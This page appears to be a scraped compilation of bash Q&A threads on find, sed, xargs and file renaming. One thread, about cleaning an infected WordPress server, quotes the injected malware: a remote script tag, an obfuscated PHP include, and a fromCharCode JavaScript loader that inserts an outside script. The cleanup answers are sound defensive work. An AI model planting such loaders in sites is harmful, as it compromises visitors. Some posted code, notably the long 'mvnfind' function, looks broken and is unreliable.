find - grep taking too much time - bash

First of all I'm a newbie with bash scripting so forgive me if i'm making easy mistakes.
Here's my problem. I needed to download my company's website. I accomplish this using wget with no problems but because some files have the ? symbol and windows doesn't like filenames with ? I had to create a script that renames files and also update the source code of all files that calls the rename file.
To accomplish this I use the following code:
find . -type f -name '*\?*' | while read -r file ; do
SUBSTRING=$(echo $file | rev | cut -d/ -f1 | rev)
NEWSTRING=$(echo $SUBSTRING | sed 's/?/-/g')
mv "$file" "${file//\?/-}"
grep -rl "$SUBSTRING" * | xargs sed -i '' "s/$SUBSTRING/$NEWSTRING/g"
done
This is having 2 problems.
This is taking way too long, I've waited more than 5 hours and is still going.
It looks like is doing a append in the source code because when i stop the script and search for changes the URL is repeated like 4 times ( or more ).
Thanks all for your comments, i will try the 2 separete step and see, also, just as FYI, there are 3291 files that were downloaded with wget, still thinking that using bash scripting is prefer over other tools for this?

Seems odd that a file would have ? in it. Website URLs have ? to indicate passing of parameters. wget from a website also doesn't guarantee you're getting the site, especially if server side execution takes place, like php files. So, I suspect as wget does its recursiveness, it's finding url's passing parameters and thus creating them for you.
To really get the site, you should have direct access to the files.
If I were you, I'd start over and not use wget.
You may also be having issues with files or directories with spaces in their name.
Instead of that line with xargs, you're already doing one file at a time, but grepping for all recursively. Just do the sed on the new file itself.

Ok, here's the idea (untested):
in the first loop, just move the files and compose a global sed replacement file
once it is done, just scan all the files and apply sed with all the patterns at once, thus saving a lot of read/write operations which are likely to be the cause of the performance issue here
I would avoid to put the current script in the current directory or it will be processed by sed, so I suppose that all files to be processed are not in the current dir but in data directory
code:
sedfile=/tmp/tmp.sed
data=data
rm -f $sedfile
# locate ourselves in the subdir to preserve the naming logic
cd $data
# rename the files and compose the big sedfile
find . -type f -name '*\?*' | while read -r file ; do
SUBSTRING=$(echo $file | rev | cut -d/ -f1 | rev)
NEWSTRING=$(echo $SUBSTRING | sed 's/?/-/g')
mv "$file" "${file//\?/-}"
echo "s/$SUBSTRING/$NEWSTRING/g" >> $sedfile
done
# now apply the big sedfile once on all the files:
# if you need to go recursive:
find . -type f | xargs sed -i -f $sedfile
# if you don't:
sed -i -f $sedfile *

Instead of using grep, you can use the find command or ls command to list the files and then operate directly on them.
For example, you could do:
ls -1 /path/to/files/* | xargs sed -i '' "s/$SUBSTRING/$NEWSTRING/g"
Here's where I got the idea based on another question where grep took too long:
Linux - How to find files changed in last 12 hours without find command

Related

Copy files matching both sub directories and file names from strings in file

I want to copy files from multiple sub directories to a new directory within the main directory called copiedFiles/. I only want to copy files that can be matched to strings in the file strs2bMatchd.csv. The names of the sub directories also matches the first part of the strings to be matched (see example below).
The main directory with sub directories looks like this
main_dir/
strs2bMatchd.csv
1111/
1111_aaa1_x873.csv
1111_aaa2_x874.csv
1111_ddd1_x443.csv
1111_ddd2_x444.csv
1112/
1112_bbb1_x912.csv
1112_bbb2_x913.csv
1112_fff1_x664.csv
1112_fff2_x665.csv
1113/
1113_ccc1_x912.csv
1113_ccc2_x913.csv
The files to be copied should match the strings in strs2bMatchd.csv file
cat strs2bMatchd.csv
1111_aaa1
1111_aaa2
1112_bbb1
1112_bbb2
1113_ccc1
1113_ccc2
This is the expected result
main_dir/
strs2bMatchd.csv
1111/
1111_aaa1_x873.csv
1111_aaa2_x874.csv
1111_ddd1_x443.csv
1111_ddd2_x444.csv
1112/
1112_bbb1_x912.csv
1112_bbb2_x913.csv
1112_fff1_x664.csv
1112_fff2_x665.csv
1113/
1113_ccc1_x912.csv
1113_ccc2_x913.csv
copiedFiles/
1111_aaa1_x873.csv
1111_aaa2_x874.csv
1112_bbb1_x912.csv
1112_bbb2_x913.csv
1113_ccc1_x912.csv
1113_ccc2_x913.csv
As an alternative, consider
M=main_dir
mkdir -p $M/copiedFiles
find $M | grep -F -v "$M/copiedFiles" | grep -Ff $M/strs2bMatch.csv | xargs cp -t $M/copiedFiles/
It will execute the find once.
If the files may contain space or other special characters, consider using the safe version (NUL terminated strings) - for find (-print0), grep (-z -Z) xargs (-0).
Update 1: OP indicate his version of cp does not have -t. Alternative solution, without this options is posted.
I can not test, please try to solve problem using man, etc.
M=main_dir
mkdir -p $M/copiedFiles
find $M | grep -F -v "$M/copiedFiles" | grep -Ff $M/strs2bMatch.csv | xargs -I{} cp {} $M/copiedFiles/

How to replace whole string using sed or possibly grep

So my whole server got hacked or got the malware problem. my site is based on WordPress and the majority of sites hosted on my server is WordPress based. The hacker added this line of code to every single file and in database
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string on a single file index.php first, so I know it works.
and I know my code is wrong. Please help me with this.
I tried with the #Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
Though #slybloty's solution is easy and it worked.
so to remove the code fully from all the affected files. I'm running the following 3 commands, Thanks to all of you for this.
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the #include line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.
now, I still need to figure out the junk files and traces of it.
The hacker script added the JS code as well.
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - find
-type f - only files
-name '*.txt' - that end with php
-print0 - pritn them separated by zero bytes
| xargs -0 - for each file separated by zero byte
-P7 - run 7 processes concurently
-n1 - for each one file
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run from other answers.
You may want to add -t option to xargs to see the progress. See man find (man args](http://man7.org/linux/man-pages/man1/xargs.1.html).
Single quotes are taken literally without escape characters.
In var='hello\'', you have an un-closed quote.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed can use any delimiter to separate commands. Since you have slashes in the commands, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This idea is unique to bash.
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
Edit: Please see #EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. GNU version of sed should have this. I'm also making the assumption that this code always appears in the format being 6 lines long
while read -r filename; do
# .bak optional here if you want to back any files that are edited
sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g'
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything until a line feed, and then matches the line feed, avoiding greedy regex matching. Because we aren't splitting on line feeds (-z), the regex var pl = String\.fromCharCode(104,116,116,112,115' .).*\n}\n matches the largest possible match. For example, if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Thus, repeating this sequence 6 times matches us to the end of the first line as well as the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that have the matching pattern. This way, sed isn't editing every file. Without this, -i.bak (not plain -i) would make a mess.
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today, all page posts got this nasty virus script added
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I dissabled it from database by
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
I do not have files infected at least
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not found a thing, but I have no idea how this got into database from which am not calm at all.
This infection caused redirects on pages, chrome mostly detect and block this. Did not notice anything strange in - /wp-mail-smtp/src/Debug.php
For me worked this:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search for : *.js, *.json, *.map
I've got the same thing today, all page posts got the script added.
I've handled with them successfully by using the Search and replace plugin.
Moreover, I've also found one record in wp_posts table post_content column
folowing string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

Can I convert between UpperCamelCase, lowerCamelCase and dash-case in filenemes with Bash? [duplicate]

This question already has answers here:
linux bash, camel case string to separate by dash
(9 answers)
Closed 6 years ago.
I am in the process of merging efforts with another developer. I am using UpperCamelCasing, but we decided to follow Google's HTML style guide in using lower case and separating words with hyphens. This decision requires me to rename quite some files on my filesystem. I first though this to be easy since I often use bash for renaming large collections of files. Unfortunately renaming on the Casing style appeared to be a bit more complicating and I did not manage to find an approach.
Can I convert files from one naming convention to another with Bash?
Try using rename command with -f option to rename files with desired substitutions.
rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/' <list_of_files>
If you also want to extract <list_of_files> with some pattern, let's say extension .ext, you need to combine find with above command using xargs
find -type f -name "*.ext" -print0 | xargs -0 rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/'
For example if you want to rename all files in pwd
$ ls
dash-case
lowerCamelCase
UpperCamelCase
$ rename -f 's/([a-z])([A-Z])/$1-$2/g; y/A-Z/a-z/' *
$ ls
dash-case
lower-camel-case
upper-camel-case
Try this:
for FILE in *; do NEWFILE=$((sed -re 's/\B([A-Z])/-\1/g' | tr [:upper:] [:lower:]) <<< "$FILE"); if [ "$NEWFILE" != "$FILE" ]; then echo mv \""$FILE"\" \""$NEWFILE"\"; fi; done
This should give you a list of "mv" statements on standard output. Double-check that they look right, then just add | bash to the end of the statement to run them all.
How does it work?
for FILE in *; do
NEWFILE=$((sed -re 's/\B([A-Z])/-\1/g' | tr [:upper:] [:lower:]) <<< "$FILE")
if [ "$NEWFILE" != "$FILE" ]; then
echo mv \""$FILE"\" \""$NEWFILE"\"
fi
done
The for FILE in * loops across all files in the current directory, acknowledging that there are a wide variety of ways to loop through all files. The sed statement matches only uppercase letters that, according to \B, aren't on a word boundary (i.e. at the beginning of the string). Because of this selective match, it makes the most sense to switch everything to lowercase in a separate call to tr. Finally, the condition ensures that you only see the filenames that change, and the trick of using echo ensures that you don't make changes to your filesystem without seeing them first.
I ran into a similar question and based on one answer there I came to the following solution. It is not a full Bash solution, since it relies on perl, but since it does the trick I am sharing it.
ls |for file in `xargs`; do mv $file `echo $file | perl -ne 'print lc(join("-", split(/(?=[A-Z])/)))'`; done

Bash Script - Copy latest version of a file in a directory recursively

Below, I am trying to find the latest version of a file that could be in multiple directories.
Example Directory:
~inventory/emails/2012/06/InventoryFeed-Activev2.csv 2012/06/05
~inventory/emails/2012/06/InventoryFeed-Activev1.csv 2012/06/03
~inventory/emails/2012/06/InventoryFeed-Activev.csv 2012/06/01
Heres the bash script:
#!/bin/bash
FILE = $(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
#echo $FILE #For Testing
cp $FILE ~/inventory/Feed-active.csv;
The error I am getting is:
./inventory.sh: line 5: FILE: command not found
The script should copy the newest file as attempted above.
Two questions:
First, is this the best method to achive what I want?
Secondly, Whats wrong above?
It looks good, but you have spaces around the = sign. This won't work. Try:
#!/bin/bash
FILE=$(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
#echo $FILE #For Testing
cp $FILE ~/inventory/Feed-active.csv;
... Whats wrong above?
Variable assignment. You are not supposed to put extra spaces around = sign. The following should work:
FILE=$(find ~/inventory/emails/ -name INVENTORYFEED-Active\*.csv | sort -n | tail -1)
... is this the best method to achive what I want?
Probably not. But the best way depends on many factors. Perhaps whoever writes those files, can put them in a right location in the first place. You can also check file modification time, but that could fail, too... So as long as it works for you, I'd say go for it :)

Commandline find, sed, exec

I have a bunch of files in a folder, in subfolders and I'm trying to make some kind of one-liner for quick copy/pasting once in a while.
The contents is (too long to paste here): http://pastebin.com/4aZCPbwT
I've tried the following commands:
List all files and their directories
find . -name '[!.]*'
Replace all instances of "Namespace" with "Test:
find . -name '[!.]*' -print0 | sed 's/Namespace/Test/gI' | xargs -i -0 echo '{}'
What I need to do is:
Replace foldes names like above, and copy the folders (including files), to another location. Create the folders if they don't exist (they most likely won't) - BUT, there are some of them that I don't need, like ./app, as this folder exists. I could use -wholename './app' for that.
When they are copied, I need to replace some text inside each file, same as above (Namespace with Test - also occours inside the files and save them of course).
Something like this I would imagine:
-print -exec sed -i 's/Namespace/Test/gI' {} \;
Can these 3 things be done in a one-liner? Replace text in files (Namespace <=> Test), copy files including their directories with cp -p (don't want to write over folders), but renaming each directory/file with as above (Namespace <=> Test).
Thanks a lot :-)
Besides describing the how with painstaking verbosity below, this method may also be unique in that it incorporates built-in debugging. It basically doesn't do anything at all as written except compile and save to a variable all commands it believes it should do in order to perform the work requested.
It also explicitly avoids loops as much as possible. Besides the sed recursive search for more than one match of the pattern there is no other recursion as far as I know.
And last, this is entirely null delimited - it doesn't trip on any character in any filename except the null. I don't think you should have that.
By the way, this is REALLY fast. Look:
% _mvnfind() { mv -n "${1}" "${2}" && cd "${2}"
> read -r SED <<SED
> :;s|${3}\(.*/[^/]*${5}\)|${4}\1|;t;:;s|\(${5}.*\)${3}|\1${4}|;t;s|^[0-9]*\(.*\)${5}|\1|p
> SED
> find . -name "*${3}*" -printf "%d\tmv %P ${5} %P\000" |
> sort -zg | sed -nz ${SED} | read -r ${6}
> echo <<EOF
> Prepared commands saved in variable: ${6}
> To view do: printf ${6} | tr "\000" "\n"
> To run do: sh <<EORUN
> $(printf ${6} | tr "\000" "\n")
> EORUN
> EOF
> }
% rm -rf "${UNNECESSARY:=/any/dirs/you/dont/want/moved}"
% time ( _mvnfind ${SRC=./test_tree} ${TGT=./mv_tree} \
> ${OLD=google} ${NEW=replacement_word} ${sed_sep=SsEeDd} \
> ${sh_io:=sh_io} ; printf %b\\000 "${sh_io}" | tr "\000" "\n" \
> | wc - ; echo ${sh_io} | tr "\000" "\n" | tail -n 2 )
<actual process time used:>
0.06s user 0.03s system 106% cpu 0.090 total
<output from wc:>
Lines Words Bytes
115 362 20691 -
<output from tail:>
mv .config/replacement_word-chrome-beta/Default/.../googlestars \
.config/replacement_word-chrome-beta/Default/.../replacement_wordstars
NOTE: The above function will likely require GNU versions of sed and find to properly handle the find printf and sed -z -e and :;recursive regex test;t calls. If these are not available to you the functionality can likely be duplicated with a few minor adjustments.
This should do everything you wanted from start to finish with very little fuss. I did fork with sed, but I was also practicing some sed recursive branching techniques so that's why I'm here. It's kind of like getting a discount haircut at a barber school, I guess. Here's the workflow:
rm -rf ${UNNECESSARY}
I intentionally left out any functional call that might delete or destroy data of any kind. You mention that ./app might be unwanted. Delete it or move it elsewhere beforehand, or, alternatively, you could build in a \( -path PATTERN -exec rm -rf \{\} \) routine to find to do it programmatically, but that one's all yours.
_mvnfind "${#}"
Declare its arguments and call the worker function. ${sh_io} is especially important in that it saves the return from the function. ${sed_sep} comes in a close second; this is an arbitrary string used to reference sed's recursion in the function. If ${sed_sep} is set to a value that could potentially be found in any of your path- or file-names acted upon... well, just don't let it be.
mv -n $1 $2
The whole tree is moved from the beginning. It will save a lot of headache; believe me. The rest of what you want to do - the renaming - is simply a matter of filesystem metadata. If you were, for instance, moving this from one drive to another, or across filesystem boundaries of any kind, you're better off doing so at once with one command. It's also safer. Note the -noclobber option set for mv; as written, this function will not put ${SRC_DIR} where a ${TGT_DIR} already exists.
read -R SED <<HEREDOC
I located all of sed's commands here to save on escaping hassles and read them into a variable to feed to sed below. Explanation below.
find . -name ${OLD} -printf
We begin the find process. With find we search only for anything that needs renaming because we already did all of the place-to-place mv operations with the function's first command. Rather than take any direct action with find, like an exec call, for instance, we instead use it to build out the command-line dynamically with -printf.
%dir-depth :tab: 'mv '%path-to-${SRC}' '${sed_sep}'%path-again :null delimiter:'
After find locates the files we need it directly builds and prints out (most) of the command we'll need to process your renaming. The %dir-depth tacked onto the beginning of each line will help to ensure we're not trying to rename a file or directory in the tree with a parent object that has yet to be renamed. find uses all sorts of optimization techniques to walk your filesystem tree and it is not a sure thing that it will return the data we need in a safe-for-operations order. This is why we next...
sort -general-numerical -zero-delimited
We sort all of find's output based on %directory-depth so that the paths nearest in relationship to ${SRC} are worked first. This avoids possible errors involving mving files into non-existent locations, and it minimizes need to for recursive looping. (in fact, you might be hard-pressed to find a loop at all)
sed -ex :rcrs;srch|(save${sep}*til)${OLD}|\saved${SUBSTNEW}|;til ${OLD=0}
I think this is the only loop in the whole script, and it only loops over the second %Path printed for each string in case it contains more than one ${OLD} value that might need replacing. All other solutions I imagined involved a second sed process, and while a short loop may not be desirable, certainly it beats spawning and forking an entire process.
So basically what sed does here is search for ${sed_sep}, then, having found it, saves it and all characters it encounters until it finds ${OLD}, which it then replaces with ${NEW}. It then heads back to ${sed_sep} and looks again for ${OLD}, in case it occurs more than once in the string. If it is not found, it prints the modified string to stdout (which it then catches again next) and ends the loop.
This avoids having to parse the entire string, and ensures that the first half of the mv command string, which needs to include ${OLD} of course, does include it, and the second half is altered as many times as is necessary to wipe the ${OLD} name from mv's destination path.
sed -ex...-ex search|%dir_depth(save*)${sed_sep}|(only_saved)|out
The two -exec calls here happen without a second fork. In the first, as we've seen, we modify the mv command as supplied by find's -printf function command as necessary to properly alter all references of ${OLD} to ${NEW}, but in order to do so we had to use some arbitrary reference points which should not be included in the final output. So once sed finishes all it needs to do, we instruct it to wipe out its reference points from the hold-buffer before passing it along.
AND NOW WE'RE BACK AROUND
read will receive a command that looks like this:
% mv /path2/$SRC/$OLD_DIR/$OLD_FILE /same/path_w/$NEW_DIR/$NEW_FILE \000
It will read it into ${msg} as ${sh_io} which can be examined at will outside of the function.
Cool.
-Mike
I haven't tested this, but I think it's what you're after.
find . -name '[!.]*' -print | while read line; do nfile=`echo "$line" | sed 's/Namespace/Test/gI'`; mkdir -p "`dirname $nfile`"; cp -p "$line" "$nfile"; sed -i 's/Namespace/Test/gI' "$nfile"; done

Resources